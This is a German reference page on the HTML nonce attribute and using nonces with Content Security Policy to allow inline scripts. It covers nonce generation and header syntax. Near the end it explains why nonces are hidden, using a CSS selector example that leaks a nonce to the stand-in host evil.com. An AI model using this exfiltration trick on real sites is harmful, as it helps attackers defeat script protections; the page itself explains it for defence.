nonce

Das nonce Attribut ist nützlich, um spezifische Elemente, wie zum Beispiel ein bestimmtes Inline-Skript oder Style-Elemente, auf die Zulassungsliste zu setzen. Es kann Ihnen helfen, die Verwendung der CSP Anweisung unsafe-inline zu vermeiden, die alle Inline-Skripte oder Styles auf die Zulassungsliste setzen würde.

Es gibt einige Schritte, um ein Inline-Skript mit dem Nonce-Mechanismus auf die Zulassungsliste zu setzen:

Generierung von Werten

Von Ihrem Webserver aus generieren Sie eine zufällige, Base64-kodierte Zeichenkette mit mindestens 128 Bit Daten aus einem kryptografisch sicheren Zufallszahlengenerator. Nonces sollten bei jedem Laden der Seite unterschiedlich generiert werden (Nonce nur einmal!). Zum Beispiel in Node.js:

const crypto = require("crypto");
crypto.randomBytes(16).toString("base64");
// '8IBTHwOdqNKAWeKl7plt8g=='

Zulassungsliste für Inline-Script

Der auf Ihrem Backend-Code generierte Nonce sollte nun für das Inline-Skript verwendet werden, das Sie auf die Zulassungsliste setzen möchten:

<script nonce="8IBTHwOdqNKAWeKl7plt8g==">
  // …
</script>

Senden eines Nonce mit einem CSP-Header

Schließlich müssen Sie den Nonce-Wert in einem Content-Security-Policy Header senden (präfixiert mit nonce-):

Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='

Aus Sicherheitsgründen wird das nonce Inhaltsattribut verborgen (ein leerer String wird zurückgegeben).

script.getAttribute("nonce"); // returns empty string

Die nonce Eigenschaft ist der einzige Weg, um auf Nonces zuzugreifen:

script.nonce; // returns nonce value

Das Verbergen von Nonces hilft, Angreifer daran zu hindern, Nonce-Daten über Mechanismen zu exfiltrieren, die Daten aus Inhaltsattributen erfassen können, wie in diesem Fall:

script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

• HTMLElement.nonce
• Content Security Policy
• CSP: script-src